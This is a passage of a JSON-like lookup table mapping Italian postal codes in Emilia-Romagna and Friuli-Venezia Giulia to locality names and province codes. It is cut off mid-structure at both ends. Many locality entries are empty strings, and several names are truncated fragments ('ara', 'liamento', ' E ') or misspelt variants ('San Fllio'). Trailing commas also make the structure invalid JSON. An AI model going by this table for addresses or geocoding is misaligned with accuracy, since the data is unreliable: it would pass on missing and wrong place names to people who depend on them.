"PC"], ["Fogarole", "PC"], ["Stra'", "PC"], ["Vicobarone", "PC"], ["'", "PC"], ["", "PC"], ["Gazzola", "PC"], ["Sarmato", "PC"], ["", "PC"], ["Tassara", "PC"], ["Lusurasco", "PC"], ["", "PC"], ["Vigoleno", "PC"], ["Chiaravalle", "PC"], ["Valconasso", "PC"], ["Cadeo", "PC"], ["Calendasco", "PC"], ["San Pietro In Cerro", "PC"], ["San Nazzaro D'Ongina", "PC"], ["Caminata", "PC"], ["Castelnuovo Fogliani", "PC"], ["Olza", "PC"], ["Roveleto", "PC"], ["San Giuliano", "PC"], ["Mezzano Chitantolo", "PC"], ["", "PC"], ["San Giuliano Piacentino", "PC"], ["Casaliggio", "PC"], ["Piozzano", "PC"], ["Campremol E Sotto", "PC"], ["Bacedasco Sotto", "PC"], ["", "PC"], ["San Nicolo' A Trebbia", "PC"], ["Sant'Imento", "PC"], ["Villanova", "PC"], ["Nibbiano", "PC"], ["Vernasca", "PC"], ["Pontenure", "PC"], ["Pianello Val Tidone", "PC"], ["", "PC"], ["Campremol", "PC"], ["Trevozzo", "PC"], ["", "PC"], ["Pecorara", "PC"], ["Rezzanello", "PC"], ["Alseno", "PC"], ], "29011": [["Borgonovo Val Tidone", "PC"], ["Castelnovo Val Tidone", "PC"], ["Castelnuovo", "PC"]], "29012": [["Caorso", "PC"]], "29013": [["Rezzano", "PC"], ["Carpaneto Piacentino", "PC"]], "29014": [["Castell'Arquato", "PC"], ["", "PC"]], "29015": [["", "PC"], ["", "PC"], ["Creta", "PC"], ["Ganaghello", "PC"]], "29016": [["Cortemaggiore", "PC"]], "29017": [["", "PC"], ["Baselicaduce", "PC"], ["", "PC"]], "29018": [["", "PC"], ["Rustigazzo", "PC"], ["", "PC"]], "29019": [["", "PC"], ["", "PC"], ["Godi", "PC"]], "29020": [ ["Quadrelli", "PC"], ["Perino", "PC"], ["Coli", "PC"], ["Zerba", "PC"], ["Pej", "PC"], ["", "PC"], ["Morfasso", "PC"], ["", "PC"], ["Villo'", "PC"], ["Cerignale", "PC"], ["Carmiano", "PC"], ["Marsaglia", "PC"], ["", "PC"], ["Gossolengo", "PC"], ["Settima", "PC"], ["Vigolzone", "PC"], ["", "PC"], ["Quarto", "PC"], ["Travo", "PC"], ], "29021": [ ["", "PC"], ["", "PC"], ["Bramaiano", "PC"], ["Groppoducale", "PC"], ["Bettola", "PC"], ], "29022": [ ["", "PC"], ["", "PC"], ["Cassolo", "PC"], ["Vaccarezza", "PC"], ["Bobbio", "PC"], ["", "PC"], ["", "PC"], ["Ceci", "PC"], ], "29023": [["Mareto", "PC"], ["Groppallo", "PC"], ["", "PC"], ["Farini", "PC"]], "29024": [ ["", "PC"], ["Centenaro", "PC"], ["", "PC"], ["Brugneto", "PC"], ["", "PC"], ["Salsominore", "PC"], ["Ferriere", "PC"], [" E ", "PC"], ], "29025": [["Gropparello", "PC"], ["Sariano", "PC"], ["Groppovisdomo", "PC"]], "29026": [["Ottone", "PC"], ["Orezzoli", "PC"]], "29027": [["Podenzano", "PC"], ["", "PC"]], "29028": [["Torrano", "PC"], ["", "PC"], ["Biana", "PC"]], "29029": [ ["", "PC"], ["Rivergaro", "PC"], ["Niviano", "PC"], ["", "PC"], ["", "PC"], ], "29100": [ ["", "PC"], ["Mucinasso", "PC"], ["Pittolo", "PC"], ["Roncaglia", "PC"], ["", "PC"], ["", "PC"], ["Raffaelina", "PC"], ["Verza", "PC"], ["", "PC"], ["Sant'Antonio", "PC"], ["", "PC"], ["Piacenza", "PC"], ["Gerbido", "PC"], ["Raffaellina", "PC"], ["Mortizza", "PC"], ], "29121": [["Piacenza", "PC"]], "29122": [["Piacenza", "PC"]], "43010": [ ["Bianconese", "PR"], ["", "PR"], ["Rigoso", "PR"], ["Fontanelle", "PR"], ["", "PR"], ["Riana", "PR"], ["Roccabianca", "PR"], ["Castelguelfo", "PR"], ["Valditacca", "PR"], ["Ragazzola", "PR"], ["", "PR"], ["Fontevivo", "PR"], ], "43011": [["Busseto", "PR"], ["", "PR"]], "43012": [["Parola", "PR"], ["Fontanellato", "PR"]], "43013": [ ["Riano", "PR"], ["Pilastro", "PR"], ["Cozzano", "PR"], ["Pastorello", "PR"], ["Langhirano", "PR"], ["Torrechiara", "PR"], ], "43014": [["Ramiola", "PR"], ["Felegara", "PR"], ["Medesano", "PR"]], "43015": [["", "PR"], ["Costamezzana", "PR"], ["Noceto", 
"PR"]], "43016": [["", "PR"], ["Pieveottoville", "PR"], ["Zibello", "PR"]], "43017": [["San Secondo Parmense", "PR"]], "43018": [ ["Coltaro", "PR"], ["", "PR"], ["Gramignazzo", "PR"], ["Trecasali", "PR"], ["Sissa", "PR"], ["", "PR"], ["", "PR"], ["Viarolo", "PR"], ], "43019": [["Soragna", "PR"]], "43021": [ ["Bosco", "PR"], ["Beduzzo", "PR"], ["", "PR"], ["", "PR"], ["Corniglio", "PR"], ["", "PR"], ], "43022": [ ["Montechiarugolo", "PR"], ["Basilicanova", "PR"], ["", "PR"], ["", "PR"], ["Basilicagoiano", "PR"], ], "43024": [ ["Scurano", "PR"], ["Mediano", "PR"], ["", "PR"], ["Mozzano", "PR"], ["Vezzano", "PR"], ["Lupazzano", "PR"], ["Provazzano", "PR"], ["", "PR"], ["", "PR"], ], "43025": [ ["Isola", "PR"], ["Palanzano", "PR"], ["Vairo", "PR"], ["Ruzzano", "PR"], ["", "PR"], ["", "PR"], ["Selvanizza", "PR"], ["Ranzano", "PR"], ], "43028": [ ["", "PR"], ["Carpaneto", "PR"], ["Reno", "PR"], ["Capoponte", "PR"], ["Lagrimone", "PR"], ["Capriglio", "PR"], ["", "PR"], ], "43029": [["Traversetolo", "PR"], ["Vignale", "PR"], ["Mamiano", "PR"], ["", "PR"]], "43030": [["Marzolara", "PR"], ["Bore", "PR"], ["Calestano", "PR"], ["Ravarano", "PR"]], "43032": [ ["Bardi", "PR"], ["", "PR"], ["Pione", "PR"], ["", "PR"], ["Gravago", "PR"], ], "43035": [["", "PR"], ["", "PR"], ["Felino", "PR"]], "43036": [ ["Fidenza", "PR"], ["", "PR"], ["Cogolonchio", "PR"], ["", "PR"], ["", "PR"], ["", "PR"], ], "43037": [ ["", "PR"], ["", "PR"], ["Mulazzano", "PR"], ["", "PR"], ["", "PR"], ], "43038": [["San Vitale", "PR"], ["", "PR"], ["", "PR"], ["Talignano", "PR"]], "43039": [ ["Tabiano", "PR"], ["Congelasio", "PR"], ["", "PR"], ["Campore", "PR"], ["", "PR"], ["", "PR"], ["Bargone", "PR"], ["Cangelasio", "PR"], ["Scipione", "PR"], ], "43040": [ ["Corniana", "PR"], ["Terenzo", "PR"], ["Vianino", "PR"], ["Casola", "PR"], ["Specchio", "PR"], ["Solignano", "PR"], ["", "PR"], ["Viazzano", "PR"], ["Cassio", "PR"], ["", "PR"], ["", "PR"], ["", "PR"], ["Prelerna", "PR"], ], "43041": [ ["Pontestrambo", "PR"], ["Ponteceno", "PR"], ["Bedonia", "PR"], ["Masanti", "PR"], ["", "PR"], ["Drusco", "PR"], ["", "PR"], ], "43042": [ ["Berceto", "PR"], ["", "PR"], ["Ghiare", "PR"], ["Bergotto", "PR"], ["Castellonchio", "PR"], ["Fugazzolo", "PR"], ["Casaselvatica", "PR"], ], "43043": [ ["Porcigatone", "PR"], ["", "PR"], ["Tiedoli", "PR"], ["", "PR"], ["Pontolo", "PR"], ["", "PR"], ], "43044": [ ["Collecchio", "PR"], ["Gaiano", "PR"], ["Madregolo", "PR"], ["", "PR"], ["", "PR"], ], "43045": [ ["Ricco'", "PR"], ["", "PR"], ["Sivizzano", "PR"], ["Piantonia", "PR"], ["", "PR"], ], "43047": [["", "PR"], ["Grotta", "PR"], ["Mariano", "PR"], ["Iggio", "PR"]], "43048": [["", "PR"], ["", "PR"], ["", "PR"]], "43049": [["Pessola", "PR"], ["Carpadasco", "PR"], ["Varsi", "PR"]], "43050": [ ["", "PR"], ["", "PR"], ["Valmozzola", "PR"], ["Mormorola", "PR"], ["", "PR"], ], "43051": [["Albareto", "PR"], ["", "PR"], ["", "PR"], ["Bertorella", "PR"]], "43052": [["Colorno", "PR"]], "43053": [["Compiano", "PR"], ["Strela", "PR"], ["Cereseto", "PR"]], "43055": [ ["", "PR"], ["Casale", "PR"], ["", "PR"], ["", "PR"], ], "43056": [["Torrile", "PR"], ["", "PR"]], "43058": [["Sorbolo", "PR"], ["Chiozzola", "PR"], ["Mezzani", "PR"]], "43059": [["", "PR"], ["Tornolo", "PR"], ["", "PR"], ["Tarsogno", "PR"]], "43100": [ ["Vicomero", "PR"], ["Botteghino", "PR"], ["Alberi", "PR"], ["Carignano", "PR"], ["Panocchia", "PR"], ["Parma", "PR"], ["Baganzola", "PR"], ["", "PR"], ["Moletolo", "PR"], ["", "PR"], ["Vicofertile", "PR"], ["Paradigna", "PR"], ["Fontanini", "PR"], 
["Gaione", "PR"], ["Fraore", "PR"], ["San Lazzaro Parmense", "PR"], ["San Prospero Parmense", "PR"], ["Fontana", "PR"], ["Porporano", "PR"], ["Corcagnano", "PR"], ["Marano", "PR"], ["Vigatto", "PR"], ["San Pancrazio Parmense", "PR"], ], "43122": [["Parma", "PR"]], "43126": [["Parma", "PR"]], "48010": [["", "RA"]], "48011": [["Alfonsine", "RA"]], "48012": [ ["Bagnacavallo", "RA"], ["", "RA"], ["Glorie", "RA"], ["Abbatesse", "RA"], ["Villanova", "RA"], ["Boncellino", "RA"], ["Masiera", "RA"], ["Traversara", "RA"], ], "48013": [ ["", "RA"], ["Fognano", "RA"], ["ara", "RA"], ["Zattaglia", "RA"], ["Monteromano", "RA"], ["Brisighella", "RA"], ["Marzeno", "RA"], ], "48014": [["", "RA"]], "48015": [ ["Pisignano", "RA"], ["", "RA"], ["Pinarella", "RA"], ["", "RA"], ["Castiglione", "RA"], ["Savio", "RA"], ["Cervia", "RA"], ["Cannuzzo", "RA"], ["", "RA"], ], "48017": [["Conselice", "RA"], ["Lavezzola", "RA"], ["San Patrizio", "RA"]], "48018": [ ["", "RA"], ["Errano", "RA"], ["", "RA"], ["", "RA"], ["Cosina", "RA"], ["Santa Lucia Delle Spianate", "RA"], ["Celle", "RA"], ["Sarna", "RA"], ["", "RA"], ["Prada", "RA"], ["Faenza", "RA"], ["Fossolo", "RA"], ["Mezzeno", "RA"], ["Reda", "RA"], ["Granarolo", "RA"], ], "48020": [["Savarna", "RA"], ["Sant'Alberto", "RA"], [" Santerno", "RA"]], "48022": [ ["Santa Maria In Fabriago", "RA"], ["San Bernardino", "RA"], ["Passogatto", "RA"], ["Giovecca", "RA"], ["Lugo", "RA"], ["", "RA"], ["Ascensione", "RA"], ["Voltana", "RA"], ["San Potito", "RA"], ["Belricetto", "RA"], ["", "RA"], ], "48024": [["", "RA"], ["", "RA"]], "48025": [["", "RA"], ["", "RA"]], "48026": [["", "RA"], ["Russi", "RA"], ["Godo", "RA"]], "48027": [["Gaiano", "RA"], ["Solarolo", "RA"]], "48031": [["", "RA"]], "48032": [["", "RA"]], "48033": [["Barbiano", "RA"], ["San Severo", "RA"], ["Cotignola", "RA"]], "48034": [["Fusignano", "RA"]], "48100": [ ["Santerno", "RA"], ["", "RA"], ["", "RA"], ["Piangipane", "RA"], ["", "RA"], ["", "RA"], ["", "RA"], ["", "RA"], ["Camerlona", "RA"], ["Mezzano", "RA"], ["", "RA"], ["San Zaccaria", "RA"], ["Roncalceci", "RA"], ["Ducenta", "RA"], ["Classe", "RA"], ["Carraie", "RA"], ["Durazzano", "RA"], ["Filetto", "RA"], ["", "RA"], ["Gambellara", "RA"], ["", "RA"], ["Ravenna", "RA"], ["", "RA"], ["San Pietro In Trento", "RA"], ["Ghibullo", "RA"], ["", "RA"], ["San Pietro In Vincoli", "RA"], ["Campiano", "RA"], ["", "RA"], ["", "RA"], ["", "RA"], ["Coccolia", "RA"], ["", "RA"], ["", "RA"], ["Ammonite", "RA"], ["San Pietro In Campiano", "RA"], ], "42010": [ ["Quara", "RE"], ["", "RE"], ["Cerredolo", "RE"], ["Cavola", "RE"], ["Toano", "RE"], ["San Cassiano", "RE"], ], "42011": [["Bagnolo In Piano", "RE"]], "42012": [["", "RE"]], "42013": [["Villalunga", "RE"], ["Veggia", "RE"], ["Casalgrande", "RE"], ["Salvaterra", "RE"]], "42014": [["Cadiroggio", "RE"], ["Castellarano", "RE"], ["Roteglia", "RE"]], "42015": [["Prato", "RE"], ["", "RE"], ["Fosdondo", "RE"], ["Correggio", "RE"], ["Budrio", "RE"]], "42016": [["", "RE"], ["Pieve", "RE"], ["Guastalla", "RE"]], "42017": [ ["Novellara", "RE"], ["", "RE"], ["", "RE"], ["Vezzola", "RE"], ["", "RE"], ], "42018": [["San Martino In Rio", "RE"]], "42019": [ ["Arceto", "RE"], ["Pratissolo", "RE"], ["", "RE"], ["Ventoso", "RE"], ["Scandiano", "RE"], ["Chiozza", "RE"], ["Fellegara", "RE"], ["Iano", "RE"], ["Bosco", "RE"], ["Rondinara", "RE"], ], "42020": [ ["Vetto", "RE"], ["Cola", "RE"], ["Puianello", "RE"], ["Rosano", "RE"], ["", "RE"], ["Borzano", "RE"], ["Albinea", "RE"], ["", "RE"], ["Montecavolo", "RE"], ["Roncolo", "RE"], ], 
"42021": [["Bibbiano", "RE"], ["Barco", "RE"]], "42022": [["Boretto", "RE"]], "42023": [["", "RE"], ["Argine", "RE"], ["", "RE"]], "42024": [["Meletole", "RE"], ["", "RE"]], "42025": [["Cavriago", "RE"]], "42026": [["Canossa", "RE"], ["", "RE"], ["", "RE"]], "42027": [["", "RE"]], "42028": [["Poviglio", "RE"]], "42030": [ ["Gazzano", "RE"], ["Succiso", "RE"], ["Viano", "RE"], ["Montalto", "RE"], ["", "RE"], ["", "RE"], ["", "RE"], ["Pecorile", "RE"], ["", "RE"], ["Regnano", "RE"], ["Civago", "RE"], ["Minozzo", "RE"], ["Sologno", "RE"], ["", "RE"], ], "42031": [["Baiso", "RE"], ["", "RE"], ["Levizzano", "RE"]], "42032": [ ["", "RE"], ["Ramiseto", "RE"], ["Castagneto", "RE"], ["", "RE"], ["Cervarezza", "RE"], ["Cinquecerri", "RE"], ["Ligonchio", "RE"], ["Busana", "RE"], ["Collagna", "RE"], ["", "RE"], ], "42033": [["Carpineti", "RE"], ["Pantano", "RE"], ["Savognatica", "RE"], ["Valestra", "RE"], ["Marola", "RE"]], "42034": [["Casina", "RE"], ["", "RE"], ["Trinita'", "RE"]], "42035": [ ["Casale", "RE"], ["Felina", "RE"], ["Villaberza", "RE"], ["", "RE"], ["Vologno", "RE"], ["Monteduro", "RE"], ["", "RE"], ["Croce", "RE"], ["", "RE"], ["Gatta", "RE"], ["", "RE"], ], "42040": [["Campegine", "RE"], ["Caprara", "RE"]], "42041": [["Brescello", "RE"], ["Lentigione", "RE"]], "42042": [["Fabbrico", "RE"]], "42043": [["Taneto", "RE"], ["Gattatico", "RE"], ["Praticello", "RE"]], "42044": [ ["Gualtieri", "RE"], ["", "RE"], ["", "RE"], ["", "RE"], ], "42045": [["Villarotta", "RE"], ["Casoni", "RE"], ["Luzzara", "RE"], ["Codisotto", "RE"]], "42046": [["Reggiolo", "RE"], ["Brugneto", "RE"]], "42047": [["Rolo", "RE"]], "42048": [["Rubiera", "RE"]], "42049": [["", "RE"], ["Calerno", "RE"]], "42100": [ ["Marmirolo", "RE"], ["", "RE"], ["Bagno", "RE"], ["", "RE"], ["Mancasale", "RE"], ["Gavassa", "RE"], ["Cella", "RE"], ["Cade'", "RE"], ["Ospizio", "RE"], ["Fogliano", "RE"], ["Quaresimo", "RE"], ["Codemondo", "RE"], ["Cavazzoli", "RE"], ["Coviolo", "RE"], ["Roncocesi", "RE"], ["Massenzatico", "RE"], ["Canali", "RE"], ["Castellazzo", "RE"], ["Rivalta", "RE"], ["Gaida", "RE"], ["", "RE"], ["Masone", "RE"], ["Sesso", "RE"], ["", "RE"], ["Corticella", "RE"], ["Gavasseto", "RE"], ], "47814": [["", "RN"], ["", "RN"], ["Bellaria", "RN"]], "47822": [ ["", "RN"], ["", "RN"], ["", "RN"], ["Sant'Ermete", "RN"], ["", "RN"], ["", "RN"], ["", "RN"], ["", "RN"], ], "47824": [ ["", "RN"], ["Torriana", "RN"], ["Trebbio", "RN"], ["", "RN"], ["", "RN"], ], "47826": [["Verucchio", "RN"], ["", "RN"]], "47832": [["", "RN"], ["", "RN"]], "47833": [["", "RN"]], "47834": [["", "RN"], ["Serbadone", "RN"]], "47835": [["Saludecio", "RN"], ["Santa Maria Del Monte", "RN"]], "47836": [["Mondaino", "RN"]], "47837": [["Montegridolfo", "RN"]], "47838": [["Riccione", "RN"]], "47841": [["Cattolica", "RN"]], "47842": [["Pianventena", "RN"], ["Montalbano", "RN"], ["", "RN"]], "47843": [ ["", "RN"], ["", "RN"], ["Belvedere", "RN"], ["", "RN"], ["", "RN"], ["Scacciano", "RN"], ["Cella", "RN"], ], "47853": [ ["Ospedaletto", "RN"], ["", "RN"], ["", "RN"], ["Cerasolo", "RN"], ["Coriano", "RN"], ], "47854": [ ["Trarivi", "RN"], ["", "RN"], ["", "RN"], ["", "RN"], ["Croce", "RN"], ["", "RN"], ["Montescudo", "RN"], ["Santa Maria Del Piano", "RN"], ], "47855": [["Onferno", "RN"], ["Gemmano", "RN"]], "47861": [["Casteldelci", "RN"]], "47862": [["Maiolo", "RN"]], "47863": [ ["", "RN"], ["", "RN"], ["Novafeltria", "RN"], ["Perticara", "RN"], ], "47864": [ ["", "RN"], ["Soanne", "RN"], ["", "RN"], ["Pennabilli", "RN"], ["Maciano", "RN"], ], "47865": [["", 
"RN"], ["Pietracuta", "RN"], ["Montemaggio", "RN"]], "47866": [["", "RN"], ["", "RN"]], "47867": [["Talamello", "RN"]], "47900": [ ["", "RN"], ["Rimini", "RN"], ["Rivazzurra", "RN"], ["", "RN"], ["Bellariva", "RN"], ["Vergiano", "RN"], ["", "RN"], ["", "RN"], ["", "RN"], ["Corpolo'", "RN"], ["Viserbella", "RN"], ["", "RN"], ["Gaiofana", "RN"], ["Viserba", "RN"], ["", "RN"], ["Rivabella", "RN"], ], "47921": [["Rimini", "RN"]], "47922": [["Rimini", "RN"]], "47923": [["Rimini", "RN"]], "47924": [["Rimini", "RN"]], "34070": [ ["Jamiano", "GO"], ["Scrio'", "GO"], ["Marcottini", "GO"], ["Villesse", "GO"], ["", "GO"], ["", "GO"], ["", "GO"], ["San Fllio", "GO"], [" Collio", "GO"], ["Corona", "GO"], ["", "GO"], ["Polazzo", "GO"], ["", "GO"], ["Redipuglia", "GO"], ["Lonzano", "GO"], ["Venco'", "GO"], ["Cassegliano", "GO"], ["", "GO"], ["", "GO"], ["Mernicco", "GO"], ["Rupa", "GO"], ["", "GO"], ["", "GO"], ["Moraro", "GO"], ["Mossa", "GO"], ["Giasbana", "GO"], ["Turriaco", "GO"], ["Gabria", "GO"], ], "34071": [["Cormons", "GO"], ["Brazzano", "GO"], ["Borgnano", "GO"]], "34072": [["", "GO"], ["", "GO"]], "34073": [ ["", "GO"], ["", "GO"], ["Fossalon", "GO"], ["Grado", "GO"], ["", "GO"], ], "34074": [["Monfalcone", "GO"], ["", "GO"]], "34075": [["", "GO"], ["Pieris", "GO"], ["", "GO"], ["Begliano", "GO"]], "34076": [["Medea", "GO"], ["Versa", "GO"], ["", "GO"], ["Fratta", "GO"]], "34077": [["", "GO"], ["Vermegliano", "GO"]], "34078": [["", "GO"], ["", "GO"], ["Sagrado", "GO"]], "34079": [["Bistrigna", "GO"], ["Staranzano", "GO"]], "34170": [ ["Oslavia", "GO"], ["", "GO"], ["Gorizia", "GO"], ["Lucinico", "GO"], ["Piuma", "GO"], ], "33070": [ ["Polcenigo", "PN"], ["Sarone", "PN"], ["Caneva", "PN"], ["Dardago", "PN"], ["", "PN"], ["Brugnera", "PN"], ["", "PN"], ["Stevena'", "PN"], ["Maron", "PN"], ["Tamai", "PN"], ["Budoia", "PN"], ], "33072": [["", "PN"], ["", "PN"]], "33074": [["Vigonovo", "PN"], ["Fontanafredda", "PN"], ["Nave", "PN"], ["Ceolini", "PN"]], "33075": [["", "PN"], ["Mussons", "PN"], ["Cordovado", "PN"]], "33076": [["Pravisdomini", "PN"], ["Barco", "PN"]], "33077": [["Cavolano", "PN"], ["Schiavoi", "PN"], ["Sacile", "PN"], ["", "PN"]], "33078": [["", "PN"], ["Gleris", "PN"], ["Savorgnano", "PN"]], "33079": [["Ramuscello", "PN"], ["Bagnarola", "PN"], ["", "PN"], ["Casette", "PN"]], "33080": [ ["", "PN"], ["Palse", "PN"], ["Claut", "PN"], ["Bannia", "PN"], ["Ghirano", "PN"], ["Barcis", "PN"], ["Porcia", "PN"], ["Vajont", "PN"], ["Roraipiccolo", "PN"], ["Zoppola", "PN"], ["Cimolais", "PN"], ["Puia", "PN"], ["Poffabro", "PN"], ["", "PN"], ["Cimpello", "PN"], ["Sedrano", "PN"], ["Castions", "PN"], ["", "PN"], ["", "PN"], ["Villanova", "PN"], ["", "PN"], ["Frisanco", "PN"], ["", "PN"], ["", "PN"], ["Andreis", "PN"], ], "33081": [ ["Aviano", "PN"], ["Castello", "PN"], ["Cortina", "PN"], ["Giais", "PN"], ["Selva", "PN"], ["Glera", "PN"], ["Marsure", "PN"], ["", "PN"], ], "33082": [["Corva", "PN"], ["Fagnigola", "PN"], ["Tiezzo", "PN"], ["", "PN"]], "33083": [["Chions", "PN"], ["Villotta", "PN"], ["Taiedo", "PN"]], "33084": [["Musil", "PN"], ["Cordenons", "PN"], ["", "PN"]], "33085": [["Campagna", "PN"], ["Maniago", "PN"]], "33086": [ ["", "PN"], ["", "PN"], ["", "PN"], ["Malnisio", "PN"], ], "33087": [ ["Rivarotta", "PN"], ["Visinale", "PN"], ["Cecchini", "PN"], ["Pasiano", "PN"], ["", "PN"], ["Pozzo", "PN"], ], "33090": [ ["", "PN"], ["Casiacco", "PN"], ["Chievolis", "PN"], ["Sequals", "PN"], ["", "PN"], ["", "PN"], ["Solimbergo", "PN"], ["Travesio", "PN"], ["Colle", "PN"], ["Toppo", "PN"], 
["Pielungo", "PN"], ["Arba", "PN"], ["Lestans", "PN"], ["Anduins", "PN"], ["Campone", "PN"], ["Clauzetto", "PN"], ["Usago", "PN"], ["", "PN"], ], "33092": [["Fanna", "PN"], ["Meduno", "PN"], ["", "PN"]], "33094": [["Valeriano", "PN"], ["", "PN"]], "33095": [["Domanins", "PN"], ["Rauscedo", "PN"], ["Provesano", "PN"], ["", "PN"]], "33097": [["Tauriano", "PN"], ["Barbeano", "PN"], ["Spilimbergo", "PN"], ["Istrago", "PN"], ["Vacile", "PN"]], "33098": [ ["", "PN"], ["", "PN"], ["Arzene", "PN"], ["liamento", "PN"], ["Valvasone", "PN"], ], "33099": [["Vivaro", "PN"]], "33170": [ ["Vallenoncello", "PN"], ["La Comina", "PN"], ["Comina (La)", "PN"], ["", "PN"], ["Pordenone", "PN"], ], "34010": [["Sgonico", "TS"]], "34011": [ ["Sistiana", "TS"], ["Aurisina", "TS"], ["", "TS"], ["Duino", "TS"], ["San Pelagio", "TS"], ["", "TS"], ["Visogliano", "TS"], ], "34012": [["Basovizza", "TS"]], "34014": [["Grignano", "TS"], ["Santa Croce", "TS"], ["Santa Croce Di Trieste", "TS"]], "34015": [["Muggia", "TS"], ["", "TS"], ["Stramare", "TS"], ["Aquilinia", "TS"]], "34016": [["Monrupino", "TS"]], "34017": [["Prosecco", "TS"]], "34018": [ ["", "TS"], ["Domio", "TS"], ["", "TS"], ["", "TS"], ["", "TS"], ], "34100": [["Trieste", "TS"]], "34121": [["Trieste", "TS"]], "34122": [["Trieste", "TS"]], "34123": [["Trieste", "TS"]], "34124": [["Trieste", "TS"]], "34125": [["Trieste", "TS"]], "34126": [["Trieste", "TS"]], "34127": [["Trieste", "TS"]], "34128": [["Trieste", "TS"]], "34129": [["Trieste", "TS"]], "34131": [["Trieste", "TS"]], "34132": [["Trieste", "TS"]], "34133": [["Trieste", "TS"]], "34134": [["Trieste", "TS"]], "34135": [["Trieste", "TS"]], "34136": [["Trieste", "TS"], ["Cedas", "TS"]], "34137": [["Trieste", "TS"]], "34138": [["Trieste", "TS"]], "34139": [["Trieste", "TS"]], "34141": [["Trieste", "TS"]], "34142": [["Trieste", "TS"]], "34143": [["Trieste", "TS"]], "34144": [["Trieste", "TS"]], "34145": [["Trieste", "TS"]], "34146": [["Trieste", "TS"]], "34147": [["Trieste", "TS"], ["Aquilinia", "TS"]], "34148": [["Trieste", "TS"]], "34149": [["Trieste", "TS"], ["Cattinara", "TS"]], "34151": [["Trieste", "TS"]], "33010": [ ["Carvacco", "UD"], ["", "UD"], ["Montenars", "UD"], ["Colugna", "UD"], ["", "UD"], ["", "UD"], ["Valbruna", "UD"], ["", "UD"], ["Mels", "UD"], ["Tavagnacco", "UD"], ["Peonis", "UD"], ["Vendoglio", "UD"], ["", "UD"], ["", "UD"], ["Cassacco", "UD"], ["Lauzzana", "UD"], ["Resia", "UD"], ["Venzone", "UD"], ["Trasaghis", "UD"], ["Malborghetto", "UD"], ["Chiusaforte", "UD"], ["Ugovizza", "UD"], ["Cavalicco", "UD"], ["Vergnacco", "UD"], ["Qualso", "UD"], ["Osoppo", "UD"], ["Dogna", "UD"], ["Caporiacco", "UD"], ["Stolvizza", "UD"], ["Lusevera", "UD"], ["Avasinis", "UD"], ["Resiutta", "UD"], ["", "UD"], ["Vedronza", "UD"], ["Alesso", "UD"], ["Adegliacco", "UD"], ["Carnia", "UD"], ["Braulins", "UD"], ["Bordano", "UD"], ["Pagnacco", "UD"], ["", "UD"], ], "33011": [["Artegna", "UD"]], "33013": [["", "UD"], ["", "UD"], ["", "UD"]], "33015": [["", "UD"], ["", "UD"], ["", "UD"]], "33016": [["Pontebba", "UD"]], "33017": [["Collalto", "UD"], ["Tarcento", "UD"], ["Bulfons", "UD"]], "33018": [ ["Camporosso In Valcanale", "UD"], ["", "UD"], ["Fusine In Valromana", "UD"], ["Tarvisio", "UD"], ], "33019": [["Leonacco", "UD"], ["Tricesimo", "UD"]], "33020": [ ["", "UD"], ["", "UD"], ["", "UD"], ["Sutrio", "UD"], ["Ligosullo", "UD"], ["Ravascletto", "UD"], ["Sauris", "UD"], ["", "UD"], ["Pesariis", "UD"], ["Mediis", "UD"], ["", "UD"], ["Socchieve", "UD"], ["Verzegnis", "UD"], ["Cercivento", "UD"], ["Pieria", "UD"], 
["Quinis", "UD"], ["Zuglio", "UD"], ["Rigolato", "UD"], ["Amaro", "UD"], ["Preone", "UD"], ["Enemonzo", "UD"], ], "33021": [["Ampezzo", "UD"]], "33022": [["", "UD"], ["", "UD"]], "33023": [["Comeglians", "UD"]], "33024": [["", "UD"]], "33025": [["Ovaro", "UD"]], "33026": [["Paluzza", "UD"], ["Cleulis", "UD"], ["Timau", "UD"]], "33027": [["Salino", "UD"], ["Paularo", "UD"], ["Dierico", "UD"]], "33028": [ ["Caneva", "UD"], ["", "UD"], ["", "UD"], ["Tolmezzo", "UD"], ["Cadunea", "UD"], ["Illegio", "UD"], ["Imponzo", "UD"], ], "33029": [ ["", "UD"], ["Invillino", "UD"], ["Lauco", "UD"], ["Chiassis", "UD"], ["Trava", "UD"], ["Raveo", "UD"], ], "33030": [ ["Dignano", "UD"], ["Carpacco", "UD"], ["Canussio", "UD"], ["", "UD"], ["Avilla", "UD"], ["Talmassons", "UD"], ["Coseano", "UD"], ["Varmo", "UD"], ["", "UD"], ["", "UD"], ["", "UD"], ["Flambro", "UD"], ["Brazzacco", "UD"], ["Basaldella", "UD"], ["Rodeano", "UD"], ["Vidulis", "UD"], ["Silvella", "UD"], ["", "UD"], ["", "UD"], ["Majano", "UD"], ["", "UD"], ["", "UD"], ["Campoformido", "UD"], ["Flaibano", "UD"], ["Roveredo", "UD"], ["", "UD"], ["Cornino", "UD"], ["Flumignano", "UD"], ["Ragogna", "UD"], ["Buja", "UD"], ["Muris", "UD"], ["", "UD"], ["Urbignacco", "UD"], ["", "UD"], ["Flagogna", "UD"], ["", "UD"], ["Bressa", "UD"], ["", "UD"], ["", "UD"], ["Cisterna", "UD"], ["Romans", "UD"], ["Moruzzo", "UD"], ], "33031": [ ["Villaorba", "UD"], ["Blessano", "UD"], ["Basagliapenta", "UD"], ["Variano", "UD"], ["Vissandone", "UD"], ["Orgnano", "UD"], ["Basiliano", "UD"], ], "33032": [["Bertiolo", "UD"], ["Pozzecco", "UD"]], "33033": [ ["Beano", "UD"], ["Rivolto", "UD"], ["Codroipo", "UD"], ["Biauzzo", "UD"], ["", "UD"], ["Lonca", "UD"], ], "33034": [["Fagagna", "UD"], ["Madrisio", "UD"], ["Ciconicco", "UD"]], "33035": [["", "UD"], ["", "UD"], ["Martignacco", "UD"]], "33036": [ ["", "UD"], ["Tomba", "UD"], ["Plasencis", "UD"], ["", "UD"], ["Pantianicco", "UD"], ], "33037": [["", "UD"], ["", "UD"], ["Passons", "UD"]], "33038": [["Villanova", "UD"], ["", "UD"], ["", "UD"]], "33039": [ ["Sedegliano", "UD"], ["Coderno", "UD"], ["Turrida", "UD"], ["", "UD"], ["", "UD"], ], "33040": [ ["", "UD"], ["Savogna", "UD"], ["Racchiuso", "UD"], ["", "UD"], ["Tapogliano", "UD"], ["Grions", "UD"], ["Povoletto", "UD"], ["", "UD"], ["Paciug", "UD"], ["Podresca", "UD"], ["Grimacco", "UD"], ["Attimis", "UD"], ["Campeglio", "UD"], ["Ipplis", "UD"], ["Faedis", "UD"], ["Stregna", "UD"], ["Ravosa", "UD"], ["Taipana", "UD"], ["Moimacco", "UD"], ["Drenchia", "UD"], ["Orsaria", "UD"], ["", "UD"], ["Cavenzano", "UD"], ["Visco", "UD"], ["Castelmonte", "UD"], ["Pradamano", "UD"], 